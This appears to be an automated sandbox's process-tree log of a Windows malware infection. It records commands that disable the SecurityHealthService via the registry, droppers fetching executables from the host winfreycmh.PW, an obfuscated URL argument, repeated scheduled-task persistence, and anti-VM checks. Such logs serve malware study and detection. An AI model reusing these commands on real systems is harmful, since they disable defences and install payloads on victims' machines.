"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:2500

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Get-MpPreference"
5⤵
PID:2736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')
5⤵
PID:5100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')
5⤵
PID:3456

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe" "http://www.winfreycmh.PW/ee/12337506?4192289f4192289=1689838620009923700=0- 905"
4⤵
PID:1168

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 792
5⤵
PID:1108

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\uilwehjwbwb.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\uilwehjwbwb.exe" "http://www.winfreycmh.PW/ee/12337506?4192289g4192289==991878=991878;1" "991878;7qyfd;991878;1689838620009923700;1689838620009923700" "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\4192289"
4⤵
PID:3504

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\uilwehjwbwb.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\uilwehjwbwb.exe" "http://www.winfreycmh.PW/Nbrpgmmr.exe" "991878;z7rs3;1689838620009923700" "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\Nbrpgmmr.exe"
4⤵
PID:2736

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe" "http://www.winfreycmh.PW/ee/12337506?4192289f4192289=1689838620009923700=-exe-0" "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\905"
4⤵
- Modifies security service
PID:1524

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\xosefpx.exe" "http://www.winfreycmh.PW/ee/12337506?4192289f4192289=1689838620009923700=ajmhcxtfajmhcxtf" "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\905"
4⤵
PID:1620

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\Nbrpgmmr.exe
"C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\Nbrpgmmr.exe" "xosefpx.exe" "http://www.winfreycmh.PW"
4⤵
PID:3420

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\MicrosoftEdgeWebview2Setup.exe
"C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\MicrosoftEdgeWebview2Setup.exe" /silent /install
5⤵
PID:3504

C:\Program Files (x86)\Microsoft\Temp\EU9353.tmp\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\Temp\EU9353.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
6⤵
PID:4328

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
7⤵
PID:2092

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
7⤵
PID:4360

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"
8⤵
PID:4832

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"
8⤵
PID:4172

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"
8⤵
PID:4784

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjNEODNDNkQtQTI1RC00MjI1LUJCM0QtMDY1MkJFQjU4RkQ1fSIgdXNlcmlkPSJ7NzhDN0Q1NTMtNEI2Ni00RTEzLUI0QTctNDNGOUM2Mzc1RkQyfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntGRUNBRTJCMS02MzA5LTQyMTktOEY5Mi01QUY3Q0M3RjNBRkJ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3FXSlN6V3dQZmRjTFIrWEdJdjZ4clpmaVlPeGhQVTJzMU5XbWpXY2FGUGc9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNzUuMjkiIG5leHR2ZXJzaW9uPSIxLjMuMTc1LjI3IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3NDE4MTkzNzg4IiBpbnN0YWxsX3RpbWVfbXM9IjE1NjMiLz48L2FwcD48L3JlcXVlc3Q-
7⤵
PID:4236

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{23D83C6D-A25D-4225-BB3D-0652BEB58FD5}" /silent
7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3688

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\40170.exe
"C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\40170.exe"
5⤵
PID:2092

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\moakley.exe
"C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\moakley.exe"
5⤵
PID:2288

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\theocracy"
5⤵
PID:5376

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\theocracy".xml" /tn "" /f
6⤵
- Creates scheduled task(s)
PID:3312

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\gridding"
5⤵
PID:552

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\gridding".xml" /tn "" /f
6⤵
- Creates scheduled task(s)
PID:5740

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\Ceaseless"
5⤵
PID:5612

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\Ceaseless".xml" /tn "" /f
6⤵
- Creates scheduled task(s)
PID:5712

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\Lashing"
5⤵
PID:5928

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\Lashing".xml" /tn "" /f
6⤵
- Creates scheduled task(s)
PID:4828

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\hcf"
5⤵
PID:4608

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\hcf".xml" /tn "" /f
6⤵
- Creates scheduled task(s)
PID:5220

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\unproductive"
5⤵
PID:5472

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\unproductive".xml" /tn "" /f
6⤵
- Creates scheduled task(s)
PID:5936

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\CeaselessL"
5⤵
PID:5368

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\CeaselessL".xml" /tn "" /f
6⤵
- Creates scheduled task(s)
PID:996

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\LashingL"
5⤵
PID:6120

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\LashingL".xml" /tn "" /f
6⤵
- Creates scheduled task(s)
PID:5220

C:\Program Files (x86)\Neurobiological\Ceaseless.exe
"C:\Program Files (x86)\Neurobiological\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
5⤵
PID:5940

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=MojoIpcz --mojo-named-platform-channel-pipe=5940.3192.2677801317173368072
6⤵
PID:5588

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1876 --field-trial-handle=1880,i,360145277865315206,14202277490085474760,262144 --disable-features=MojoIpcz /prefetch:2
7⤵
PID:5736

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=3140 --field-trial-handle=1880,i,360145277865315206,14202277490085474760,262144 --disable-features=MojoIpcz /prefetch:8
7⤵
PID:2788

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=3104 --field-trial-handle=1880,i,360145277865315206,14202277490085474760,262144 --disable-features=MojoIpcz /prefetch:3
7⤵
PID:5708

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --mojo-platform-channel-handle=3160 --field-trial-handle=1880,i,360145277865315206,14202277490085474760,262144 --disable-features=MojoIpcz /prefetch:1
7⤵
PID:6240

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --mojo-platform-channel-handle=4184 --field-trial-handle=1880,i,360145277865315206,14202277490085474760,262144 --disable-features=MojoIpcz /prefetch:1
7⤵
PID:6712

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --mojo-platform-channel-handle=4140 --field-trial-handle=1880,i,360145277865315206,14202277490085474760,262144 --disable-features=MojoIpcz /prefetch:1
7⤵
PID:1564

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView" --webview-exe-name=Ceaseless.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --mojo-platform-channel-handle=4628 --field-trial-handle=1880,i,360145277865315206,14202277490085474760,262144 --disable-features=MojoIpcz /prefetch:1
7⤵
PID:6204

C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe
C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\imax.exe "C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\conveyances"
5⤵
PID:6036

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /xml ""C:\Users\Admin\AppData\Local\Temp\nsd9306.tmp\conveyances".xml" /tn "" /f
6⤵
- Creates scheduled task(s)
PID:492

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
5⤵
PID:5392

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5648

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6976

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3076

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5892

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1808

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6504

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7156

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5984

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3076

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6384

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:2176

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6084

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3408

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:2088

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5488

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6880

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6380

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3648

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6860

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:404

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6460

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6348

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5436

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:2956

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:2576

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:4340

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6044

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:2524

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6232

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6804

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6576

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6596

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6232

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1200

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5652

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6976

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6980

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:1808

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:5156

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3256

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8016

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7696

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:3628

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7164

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8080

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:6816

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:7184

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe
"C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\addict.exe" /mute "Microsoft Edge WebView2"
6⤵
PID:8060

C:\Users\Admin\AppData\Local\Temp\nsaEF2B.tmp\jealousy.exe
